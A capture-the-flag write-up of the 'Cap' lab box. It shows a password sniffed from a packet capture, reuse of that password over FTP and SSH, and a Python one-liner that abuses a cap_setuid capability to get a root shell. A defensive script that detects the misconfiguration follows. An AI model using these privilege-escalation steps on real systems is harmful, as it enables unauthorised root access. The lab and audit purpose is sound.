Cap

Recon

NMAP

21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    Gunicorn
|_http-title: Security Dashboard
|_http-server-header: gunicorn
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

searchsploit

  • vsftpd 3.0.3 - Remote Denial of Service

Walking the Web App

Port 80

  • We get a dashboard
    • Logged in by default as user Nathan
      • Cookies?
        • Nope
    • We see security snapshots page
      • PCAP analysis
      • The name of the box is perhaps a hint here
        • Don’t see anything useful here
    • Ipconfig output page
    • Network status page
      • We see connections
  • dirsearch cannot reach these pages (every hit is a 302 back to /), but in the browser we are automatically logged in
[23:11:25] 302 -  208B  - /data  ->  http://10.10.10.245/                   
[23:11:25] 302 -  208B  - /data/adminer.php  ->  http://10.10.10.245/       
[23:11:25] 302 -  208B  - /data/autosuggest  ->  http://10.10.10.245/       
[23:11:26] 302 -  208B  - /download/users.csv  ->  http://10.10.10.245/     
[23:11:26] 302 -  208B  - /download/history.csv  ->  http://10.10.10.245/  

WireShark

  • Downloading 0.pcap
  • We see a FTP connection and the username and password are shown
    • USER nathan
    • PASS Buck3tH4TF0RM3!
  • Logging in over FTP with these credentials, we see user.txt, and linpeas is on the system
  • The SSH password is the same password

PE

LinPeas

LinPeas shows 95% PE chance on: CVE-2021-3560

  • Upload the polkit PE PoC
    • gnome-control-center is not installed, so the exploit will not work
  • File capabilities show /usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
  • Get a root shell with $ /usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
  • root.txt is found in /root/
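The cap_setuid file capability on the Python interpreter is the whole privilege escalation, and it is exactly the kind of thing a defender should catch in a routine audit. As an added example (not part of this writeup), the Python script below parses `getcap -r / 2>/dev/null` output, accepting both the older `path = caps+flags` and newer `path caps=flags` formats, and flags setuid-class capabilities granted to interpreters; the sample getcap output is constructed.

```python
import re
from typing import Dict, List, Set

# Constructed sample of `getcap -r / 2>/dev/null` output. The python3.8 line
# mirrors the finding on this box; the others are typical entries in both
# libcap output styles.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/perl cap_dac_override=ep
"""

# Capabilities that let a process become root or bypass DAC outright.
DANGEROUS_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override",
                  "cap_dac_read_search", "cap_sys_admin", "cap_sys_ptrace",
                  "cap_chown", "cap_fowner", "cap_setfcap"}

# Binaries that run arbitrary user-supplied code; a dangerous capability on
# one of these hands the capability to anyone who can execute it.
INTERPRETER_RE = re.compile(
    r"/(python[0-9.]*|perl[0-9.]*|ruby[0-9.]*|php[0-9.]*|node|bash|sh)$")

# "path = caps+flags" (old libcap) and "path caps=flags" (libcap >= 2.41)
LINE_RE = re.compile(
    r"^(?P<path>\S+)\s+=?\s*(?P<caps>[a-z_,]+)[+=](?P<flags>[eip]+)$")


def parse_getcap(output: str) -> Dict[str, Set[str]]:
    """Map each file path to the set of capability names it carries."""
    result: Dict[str, Set[str]] = {}
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            result[m.group("path")] = set(m.group("caps").split(","))
    return result


def find_risky(output: str) -> List[str]:
    """Return interpreter paths whose capabilities can be turned into root."""
    risky = [path for path, caps in parse_getcap(output).items()
             if caps & DANGEROUS_CAPS and INTERPRETER_RE.search(path)]
    return sorted(risky)


if __name__ == "__main__":
    for path in find_risky(SAMPLE_GETCAP):
        # Remediation: strip the file capability, e.g. `setcap -r <path>`
        print(f"{path}: dangerous capability on an interpreter, fix with: setcap -r {path}")
```

On a live host, feed it the real output (`getcap -r / 2>/dev/null`) instead of the constructed sample.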